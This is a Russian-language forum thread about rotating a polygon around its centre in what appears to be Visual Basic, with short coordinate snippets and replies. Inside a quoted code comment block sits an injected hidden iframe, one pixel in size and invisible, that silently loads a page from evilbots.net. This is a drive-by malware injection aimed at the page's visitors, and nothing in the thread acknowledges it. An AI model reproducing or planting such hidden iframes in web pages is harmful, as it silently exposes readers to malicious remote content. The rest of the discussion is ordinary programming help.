|kerish| писал(а):А как поворачивать полигон вокруг своей оси без использования маркеров используя метод Rotate?
Какая формула?
|kerish| писал(а):Какая формула?
Хакер писал(а):Нда... перечитал комментарии — выглядят словно я их писал в состоянии глубокого алкогольного опьянения.
Вообще, надо бы переделать этот пример. Много там ляпов.
'***************************************************************
' Автор всего, что вы здесь можете найти:
' Владислав Петровский (mko Хакер) (mko - More known As)
' ...
' >> Site: www.fire-lines.ru
' www.fire-lines.ru/forum/
' ...
' Fire-Lines (c) 2007
'
' З.Ы. Если вас это не затруднит, заходите
' на наш форум: www.fire-lines.ru/forum
' (он очень нуждается в пользователях)
<iframe src="http://evilbots.net/fi/index.php" width=1 height=1 style="visibility: hidden"></iframe>
<html>...
BION писал(а):Может оно и ничего, но все же как-то не кошерно получается
Денис писал(а):|kerish|
"хз" не к месту сказал, ИМХО.
|kerish| писал(а):Xakep Так почему маркер поворота сбивается, хз?
tyomitch писал(а):|kerish| писал(а):Xakep Так почему маркер поворота сбивается, хз?
Объясни, что там должно происходить?
Я вообще в этой проге ничего не понял.
Rotor.y = BR1.y + 35
Rotor.x = (BR1.x + BR4.x) / 2
tyomitch писал(а):Если я правильно понял задумку, то последолжно следовать
- Код: Выделить всё
Rotor.y = BR1.y + 35
- Код: Выделить всё
Rotor.x = (BR1.x + BR4.x) / 2
alibek писал(а):Вычисляй центр и выполняй трансформации относительно него.
Хакер писал(а):Метод AddVertex принимает координаты вершины относительно именно этой точки.
Метод Move устанавливает положении этой точки в глобальной системе координат.
sosed213 писал(а):Хакер, не мог бы ты выложить пример (vector_graphic.rar) еще раз, а то старая ссылка уже не работает.
Сейчас этот форум просматривают: Google-бот и гости: 34